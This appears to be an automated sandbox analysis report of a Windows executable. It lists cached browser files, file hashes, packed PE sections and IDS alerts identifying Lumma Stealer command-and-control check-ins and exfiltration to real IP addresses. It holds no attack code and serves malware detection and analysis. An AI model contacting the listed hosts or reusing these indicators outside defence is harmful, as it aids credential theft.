......J.vM,H......W...h.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$......'....w....g....\|../5_.......T...~.y.'.'.\|...W..[...C.)......\|.[.[WK...w...w..y.{..\|.#.n>...5....5...h>..O6O>.Xx....o.B........g?.........~....?o...w.......}..-_k^........l....\|.D.TH.....o..B'..(.W-%...?...W.......E?h..........~.......?...~,..}...o^...5ox..bI.mo{[s.}.5.<.L.......<......Y.W......K..Q._...Iu...2...e)d]4.}Y..............k.%k..s.'..L(..o4...g...z............N.X.....W.O.^.4.....7......i~._7..~,bI......3.0RRq..\|.Mk..?.{.K_...t.........SYG.W^#).N^..._W...(.8.7.....W....7...m

Chrome Cache Entry: 89

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
Category:	downloaded
Size (bytes):	17174
Entropy (8bit):	2.9129715116732746
Encrypted:	false
SSDEEP:	24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
MD5:	12E3DAC858061D088023B2BD48E2FA96
SHA1:	E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
SHA-256:	90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
SHA-512:	C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
Malicious:	false
URL:	https://learn.microsoft.com/favicon.ico
Preview:	..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""

Chrome Cache Entry: 90

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	5644
Entropy (8bit):	4.785769732002188
Encrypted:	false
SSDEEP:	96:ogVOjPW7cI3aDNjExAjfWQpL0dpwmWMv7AD8RevyvRJNjyZPtJ27RlhiewZjMeZf:og5cUaDNjESLWQN0dpwm9+6DlUu7lYjX
MD5:	B5885C991E30238110973653F2408300
SHA1:	39B0A79D951F8254E21821134E047C76F57AD2A8
SHA-256:	085BF5AE32E6F7F1299CA79248B0CB67EBD31566728A69F4466E1659C004732E
SHA-512:	6BEC209D933C7A1065047637F550B7A36809D835938C04851A3B09DF644BD3EC85A2CE30F73FCFB709FE7AF3453799B2EB76702D0AB2BE067CD07D2EC03537C0
Malicious:	false
Preview:	{"brandLink":{"biName":"learn","displayName":"Learn","href":"/"},"featuredContent":[{"biName":"1-microsoft-learn-for-organizations","description":"Access curated resources to upskill your team and close skills gaps.","href":"/training/organizations/","supertitle":"Microsoft Learn for Organizations","title":"Boost your team\u0027s technical skills"}],"metadata":{"git_commit_id":"dab49ca79cb372010aeaec5e99463f6cec8df000"},"navCategories":[{"biName":"1-discover","panel":{"panelContent":[{"biName":"1-documentation","componentType":"header-panel-card","description":"In-depth articles on Microsoft developer tools and technologies","href":"/docs/","title":"Documentation"},{"biName":"2-training","componentType":"header-panel-card","description":"Personalized learning paths and courses","href":"/training/","title":"Training"},{"biName":"3-credentials","componentType":"header-panel-card","description":"Globally recognized, industry-endorsed credentials","href":"/credentials/","title":"Credential

Chrome Cache Entry: 91

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
Category:	dropped
Size (bytes):	17174
Entropy (8bit):	2.9129715116732746
Encrypted:	false
SSDEEP:	24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
MD5:	12E3DAC858061D088023B2BD48E2FA96
SHA1:	E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
SHA-256:	90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
SHA-512:	C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
Malicious:	false
Preview:	..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""

Chrome Cache Entry: 92

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 658 x 480, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	13842
Entropy (8bit):	7.802399161550213
Encrypted:	false
SSDEEP:	192:NLNf+jBQsDHg7av3EEondO8PuRu2mIYXEIiDm42NpsHFMHfgnJ4K2DVwv:NLt+1jDmY+ndXwjLUpiDwpzfwoDVk
MD5:	F6EC97C43480D41695065AD55A97B382
SHA1:	D9C3D0895A5ED1A3951B8774B519B8217F0A54C5
SHA-256:	07A599FAB1E66BABC430E5FED3029F25FF3F4EA2DD0EC8968FFBA71EF1872F68
SHA-512:	22462763178409D60609761A2AF734F97B35B9A818EC1FD9046AFAB489AAD83CE34896EE8586EFE402EA7739ECF088BC2DB5C1C8E4FB39E6A0FC5B3ADC6B4A9B
Malicious:	false
URL:	https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/install-3-5.png
Preview:	.PNG........IHDR................1....sRGB.........gAMA......a.....pHYs..........o.d..5.IDATx^..[.,.]...../<.!.B(/y..).F\r...!(.H..a ..B.~..A..KXA.M...6..8...!1....l./.X.1....2.`.y"l..R...V.....{...}._gWW.Z.VUw.N...U..P@..... ..@.A...".$..E.I.........$..("H..PD..... ..p....U.}.{.....l..A.....A........s.......D.0...@....E..x........L. /.".A.....$...Y."...%.I..["../.&.I..[`.0..IA.........p4.I.........$..("H..PD..... ..@.A...".$..E.I.........$..("H..PD..... ..@.A...".$..E.>H...O.................?.~.......].7.....a?....(H....m.G..G..a.P..?yo......f?...o. .B.....mo{[....:9<].....7.....a.....S..Cd.5,.R....#....>......._g.....Wo\|.....z.g.........w.T...]x.>.....y(.........6....[..px...U....~.~hu...}H.......~.L... ....r...iY.$..Id..Ax"../....._..U....OTo\|.Mh.km..A.k..k....n.C`\|._\=...o...a.e.. ...&.A2..k.. ....X.+...C..P....y..>.{._..(H....8(.?...w.}M.........:s_!.m.........BY..T..z.5{.W.~..6.....F....bq....m.....?.......v....o..o...ki...iX.$......\]V...V...

Chrome Cache Entry: 93

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (33273), with no line terminators
Category:	dropped
Size (bytes):	33273
Entropy (8bit):	4.918756013698695
Encrypted:	false
SSDEEP:	384:FnvJOb4OLIch+KCnMet7NPXlJl+HjZjBTRdE0zIwHdZ4vNNpUjV8din4E9hLUukj:5hOEO8chkMet7pCjBfcHkWOzUukj
MD5:	86E84C732A96BF9CF18C99B48DB90B6D
SHA1:	6A8C212067CB9FE5B8325AE1E89FCA3E7FCF20FA
SHA-256:	B54678C5BFB00DC1AFBF2E52C56F8E10173975C25FB19062EFE5DC86F1B7D769
SHA-512:	AD91A78371074B5BB2105A9AE69664371C235B7C82DFD25C9ED17F435E92018F2A0DD42203F403D7A75DF4FC63966017519F118B2B22F0DE7656B2B155636AA2
Malicious:	false
Preview:	{"items":[{"href":"./","toc_title":".NET Framework documentation"},{"href":"get-started/overview","toc_title":"Overview of .NET Framework"},{"children":[{"href":"get-started/","toc_title":"Overview"},{"href":"get-started/out-of-band-releases","toc_title":"Out-of-band releases"},{"href":"get-started/system-requirements","toc_title":"System requirements"}],"toc_title":"Get started"},{"children":[{"href":"install/","toc_title":"Overview"},{"href":"install/guide-for-developers","toc_title":"For developers"},{"children":[{"href":"install/on-windows-11","toc_title":"Windows 11"},{"href":"install/on-windows-10","toc_title":"Windows 10 and Windows Server 2016"},{"href":"install/on-windows-8-1","toc_title":"Windows 8.1 and Windows Server 2012 R2"},{"href":"install/on-windows-8","toc_title":"Windows 8 and Windows Server 2012"},{"href":"install/on-server-2022","toc_title":"Windows Server 2022"},{"href":"install/on-server-2019","toc_title":"Windows Server 2019"}],"toc_title":"By OS version"},{"hre

Chrome Cache Entry: 94

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	downloaded
Size (bytes):	5644
Entropy (8bit):	4.785769732002188
Encrypted:	false
SSDEEP:	96:ogVOjPW7cI3aDNjExAjfWQpL0dpwmWMv7AD8RevyvRJNjyZPtJ27RlhiewZjMeZf:og5cUaDNjESLWQN0dpwm9+6DlUu7lYjX
MD5:	B5885C991E30238110973653F2408300
SHA1:	39B0A79D951F8254E21821134E047C76F57AD2A8
SHA-256:	085BF5AE32E6F7F1299CA79248B0CB67EBD31566728A69F4466E1659C004732E
SHA-512:	6BEC209D933C7A1065047637F550B7A36809D835938C04851A3B09DF644BD3EC85A2CE30F73FCFB709FE7AF3453799B2EB76702D0AB2BE067CD07D2EC03537C0
Malicious:	false
URL:	https://learn.microsoft.com/en-us/content-nav/site-header/site-header.json?
Preview:	{"brandLink":{"biName":"learn","displayName":"Learn","href":"/"},"featuredContent":[{"biName":"1-microsoft-learn-for-organizations","description":"Access curated resources to upskill your team and close skills gaps.","href":"/training/organizations/","supertitle":"Microsoft Learn for Organizations","title":"Boost your team\u0027s technical skills"}],"metadata":{"git_commit_id":"dab49ca79cb372010aeaec5e99463f6cec8df000"},"navCategories":[{"biName":"1-discover","panel":{"panelContent":[{"biName":"1-documentation","componentType":"header-panel-card","description":"In-depth articles on Microsoft developer tools and technologies","href":"/docs/","title":"Documentation"},{"biName":"2-training","componentType":"header-panel-card","description":"Personalized learning paths and courses","href":"/training/","title":"Training"},{"biName":"3-credentials","componentType":"header-panel-card","description":"Globally recognized, industry-endorsed credentials","href":"/credentials/","title":"Credential

Chrome Cache Entry: 95

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Web Open Font Format (Version 2), TrueType, length 19696, version 1.0
Category:	downloaded
Size (bytes):	19696
Entropy (8bit):	7.9898910353479335
Encrypted:	false
SSDEEP:	384:37wfQhsuDSP36Elj0oScS8w3F1ZTt5JwtRGsh1SJR3YL0BeojRs8E:37Cms69owH3FPutReFYL+eods8E
MD5:	4D0BFEA9EBDA0657CEE433600ED087B6
SHA1:	F13C690B170D5BA6BE45DEDC576776CA79718D98
SHA-256:	67E7D8E61B9984289B6F3F476BBEB6CEB955BEC823243263CF1EE57D7DB7AE9A
SHA-512:	9136ADEC32F1D29A72A486B4604309AA8F9611663FA1E8D49079B67260B2B09CEFDC3852CF5C08CA9F5D8EA718A16DBD8D8120AC3164B0D1519D8EF8A19E4EA5
Malicious:	false
URL:	https://learn.microsoft.com/static/assets/0.4.029026183/styles/docons.6a251ae.34a85e0c.woff2
Preview:	wOF2......L........`..L..........................T.V..@........6.$........ ..y.......d^..Awp(......<.1..fE.......I......z-.."YTZ.p.eMd.#..7.qY..Z.!..V...!......r...Z.;b........J....X..;.^...>UQ%U..CkT.....zKG.!\8%..>.b.4o4.t..........3..C..?u....E.S$.:.....mfZ......... .Q...].y..@....m.tC.C6. ......37..,V...F.a...A.. .PQ".A...B...p...q..!QA.N..m.......(..........gv..L...5M&._..+@.U..k.....CU..@...._.9q{....B..C.dB.F.a......J_Jo..M..oR....m......r...U0...y!.@-.h7...z....e.....J+...-{.s..1...^...zM[~....Fy.';.V...=.%......"..H..w.9L..$.{d.j&..... K...P`.$.g....;.0..........T.v....j.0Ht..<. ...<\......Ol.\|_U.+rmW..JK..".e<C ...q.?...B..l..Ni.....H....D..n@.......=c.f3.7........t...Z...}{....S;..KU.Ho.`....._?m....y...32l^.(..r..........Z...{U....W(......\|.q..P.`,.YQ....-,c...g*F..=....."M.......sq....-....w(.e.K........^2e.3&.\|,..4.TO..D].........W..W%j.._...nS.X.gE..3;2..:...Y..4j.-....c0A...U...p......d.M..6.L..b....O:[['wN.\|49.......]

Chrome Cache Entry: 96

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1528x402, components 3
Category:	dropped
Size (bytes):	64291
Entropy (8bit):	7.964191793580486
Encrypted:	false
SSDEEP:	1536:NHnitWEy8ugr5KeKvJx4FqzmYyIf52YHcd/HpQxhSoywkY8+N4U4Bv:NHitHyJTeysFqiYyIfEYHchQWoywkY8v
MD5:	8CCB0248B7F2ABEEAD74C057232DF42A
SHA1:	C02BD92FEA2DF7ED12C8013B161670B39E1EC52F
SHA-256:	0A9FD0C7F32EABBB2834854C655B958EC72A321F3C1CF50035DD87816591CDCC
SHA-512:	6D6E3C858886C9D6186AD13B94DBC2D67918AA477FB7D70A7140223FAB435CF109537C51CA7F4B2A0DB00EEAD806BBE8C6B29B947B0BE7044358D2823F5057CE
Malicious:	false
Preview:	......JFIF..............ICC_PROFILE............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6...C....................................................................C............................................................................"..........................................\......................!1..A.Qaq......".....#23BR......56Urst....$%4ST....&CDbcd......EFV.u...................................[...........................!1.AQR...."2Saq.......Ts.......#356BCDUbr.....%&47c.....$'Et..............?...j.....'Gu..7.=......8. ..nh..F.....y ..=....1L\U.+.Pj.RnI.(...N.{%].b..J..r...W[

Chrome Cache Entry: 97

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 475 x 212, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	35005
Entropy (8bit):	7.980061050467981
Encrypted:	false
SSDEEP:	768:aHBEr/QXnbCgWotMq4AZZivq2/Qu0cEv1FjHBep6U0Z/68R:ahWqbTWiM7ACvdIdldhep4rR
MD5:	522037F008E03C9448AE0AAAF09E93CB
SHA1:	8A32997EAB79246BEED5A37DB0C92FBFB006BEF2
SHA-256:	983C35607C4FB0B529CA732BE42115D3FCAAC947CEE9C9632F7CACDBDECAF5A7
SHA-512:	643EC613B2E7BDBB2F61E1799C189B0E3392EA5AE10845EB0B1F1542A03569E886F4B54D5B38AF10E78DB49C71357108C94589474B181F6A4573B86CF2D6F0D8
Malicious:	false
URL:	https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/app-could-not-be-started.png
Preview:	.PNG........IHDR..............[.U....sRGB.........gAMA......a.....pHYs..........+.....RIDATx^..`........B hpwww(PJ....R.B.....K[j....@ H ..r:...].P._.`...K.ffg.v.ygf.TM.4.m...`.D".H$......"##..2e.X.t..Y".H$...d..PK.V".H$..uVm.,.H$.....b+.H$.I-#.V".H$.ZF..D".H$...[.D".Hj.)...D"..2Rl%..D".e..J$..DR.H..H$.....b+.H$..9..Neee.X,.B.\/.....o.b+.H$..9...q...EHU....p.....=z....b.7.q..........N.. ....cUAX.9...m'_...2.`.g{...4.H.9.p.4...K ^.....`.\|.n..]..m..`W..W.H.~..\|.^.a..K.6......_....K..w....9......^.....&...R....[...w..Ix=.:..^/..Epp0.5.....QRR...l....S.b.5.c.6...5..8.\....z...I......&.>....../.{.=...]'c......[.E`@Cg......Z.....c.f..,.y\|,.{.o@.j..2..:.&l4.{.]Ll.N.0..b:b...g.n.........I...Ewc....[..,i`v......F...il\|.c,{.-.....%BP.U........y.x....6..E2..n.W...J .*..`..r....F....#BCC......\|.L&........O...'........\.....;...q.n$...7...ga..x....)..A...0.{1..'1../...+yRC...W.-..b..c0dDG...U[po....2eG.G.../.@........h.:.k?.......Q...

Chrome Cache Entry: 98

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	downloaded
Size (bytes):	4897
Entropy (8bit):	4.8007377074457604
Encrypted:	false
SSDEEP:	96:A0AIvEQ+KfZcbhaW9dp45qtAdflfDOFnymoLByzfwqrLvJ4QG63JkRJ+dRp8TJHr:dgQ+KfZcbhaWjp45qtAdflfDOFnNgByQ
MD5:	0E78F790402498FA57E649052DA01218
SHA1:	9ED4D0846DA5D66D44EE831920B141BBF60A0200
SHA-256:	73F3061A46EA8FD11D674FB21FEEEFE3753FC3A3ED77224E7F66A964C0420603
SHA-512:	B46E4B90E53C7DABC7208A6FDAE53F25BD70FCFBBEF03FFC64B1B5D1EB1C01C870A7309DF167246FCCD114B483038A64D7C46CA3B9FCB3779A77E42DB6967051
Malicious:	false
URL:	https://learn.microsoft.com/en-us/content-nav/MSDocsHeader-DotNet.json?
Preview:	{"callToAction":{"primary":{"biName":"download-dotnet","href":"https://dotnet.microsoft.com/download","kind":"link","title":"Download .NET"}},"category":{"biName":"dotnet","href":"/dotnet/","kind":"link","title":".NET"},"items":[{"biName":"1-languages","items":[{"biName":"1-c-sharp","href":"/dotnet/csharp/","kind":"link","title":"C#"},{"biName":"2-f-sharp","href":"/dotnet/fsharp/","kind":"link","title":"F#"},{"biName":"3-visual-basic","href":"/dotnet/visual-basic/","kind":"link","title":"Visual Basic"}],"kind":"menu","title":"Languages"},{"biName":"2-features","items":[{"biName":"1-fundamental","href":"/dotnet/fundamentals/","kind":"link","title":"Fundamentals"},{"biName":"2-tools-and-diagnostics","href":"/dotnet/navigate/tools-diagnostics/","kind":"link","title":"Tools and diagnostics"},{"biName":"3-ai","items":[{"biName":"1-generative-ai","href":"/dotnet/ai/","kind":"link","title":"Generative AI"},{"biName":"2-mlnet","href":"/dotnet/machine-learning/","kind":"link","title":"ML.NET"}]

Chrome Cache Entry: 99

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	72
Entropy (8bit):	4.241202481433726
Encrypted:	false
SSDEEP:	3:YozDD/RNgQJzRWWlKFiFD3e4xCzY:YovtNgmzR/wYFDxkY
MD5:	9E576E34B18E986347909C29AE6A82C6
SHA1:	532C767978DC2B55854B3CA2D2DF5B4DB221C934
SHA-256:	88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
SHA-512:	5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
Malicious:	false
Preview:	{"Message":"The requested resource does not support http method 'GET'."}

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.56441333632256
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	UmotQ1qjLq.exe
File size:	2'993'664 bytes
MD5:	0c317f381e79d53cf9cdfce0497448c0
SHA1:	17540fe62c058e8416510a7be74019d13dc6be87
SHA256:	e3e467f3cbb8bc4f9d3f36a7a07f508ee6d9f8e73393882a30d42a5be983cb60
SHA512:	6ff084530d21f4201115386207f130dcca410489b564c008ed4b623cab2d7c5854b5808ec059c76e1c0f80ec14cae6fa167847700d963c76656463873fdd5341
SSDEEP:	49152:coHqwET4/fRtf8AlB69efeIJOUJWwipxXiW5acAPKe/P6qIy2TW:IzT4nRtf8AX69efeIN4wipxXPy5IyaW
TLSH:	2ED54B61B80971CFD48E17B4A87BCF61586D07BD071048D3A86DB6BABDABCC119B6C1C
File Content Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L... .pg..............................0...........@...........................0.....%.-...@.................................Y@..m..

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x708000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x67701720 [Sat Dec 28 15:20:00 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F4760C8393Ah
jl 00007F4760C83963h
add byte ptr [eax], al
jmp 00007F4760C85935h
add byte ptr [ebx], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add al, 00h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ebx], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [esi], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add ecx, dword ptr [edx]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x54059	0x6d	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x541f8	0x8	.idata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x52000	0x26000	66c2cd1f517f93cb5124d36836e32c83	False	0.999890779194079	data	7.987442000350296	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x53000	0x1000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x54000	0x1000	0x200	39a711a7d804ccbc2a14eea65cf3c27e	False	0.154296875	data	1.0789976601211375	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
zcertcrx	0x55000	0x2b2000	0x2b1600	d28f2e55ca6746b5fa38c329c9d8b299	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
urlflepf	0x307000	0x1000	0x400	66c4089666c52fee9bb9fd0618c8e023	False	0.736328125	data	5.938399998250956	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x308000	0x3000	0x2200	a558af324e708d5626e57be8d1091d0a	False	0.06066176470588235	DOS executable (COM)	0.8192254588406739	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL	Import
kernel32.dll	lstrcpy

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-30T15:52:59.535100+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49730	104.21.96.1	443	TCP
2024-12-30T15:53:19.630512+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49730	104.21.96.1	443	TCP
2024-12-30T15:53:19.630512+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49730	104.21.96.1	443	TCP
2024-12-30T15:53:20.299626+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49737	104.21.96.1	443	TCP
2024-12-30T15:53:20.760969+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	49737	104.21.96.1	443	TCP
2024-12-30T15:53:20.760969+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49737	104.21.96.1	443	TCP
2024-12-30T15:53:21.692773+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49738	104.21.96.1	443	TCP
2024-12-30T15:53:23.362663+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49739	104.21.96.1	443	TCP
2024-12-30T15:53:23.942349+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.4	49739	104.21.96.1	443	TCP
2024-12-30T15:53:24.665716+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49740	104.21.96.1	443	TCP
2024-12-30T15:53:26.726635+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49741	104.21.96.1	443	TCP
2024-12-30T15:53:28.169921+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49742	104.21.96.1	443	TCP
2024-12-30T15:53:28.204478+0100	2843864	ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2	1	192.168.2.4	49742	104.21.96.1	443	TCP
2024-12-30T15:53:33.072309+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49743	104.21.96.1	443	TCP
2024-12-30T15:53:33.553880+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49743	104.21.96.1	443	TCP
2024-12-30T15:53:34.267439+0100	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	2	192.168.2.4	49744	185.215.113.16	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
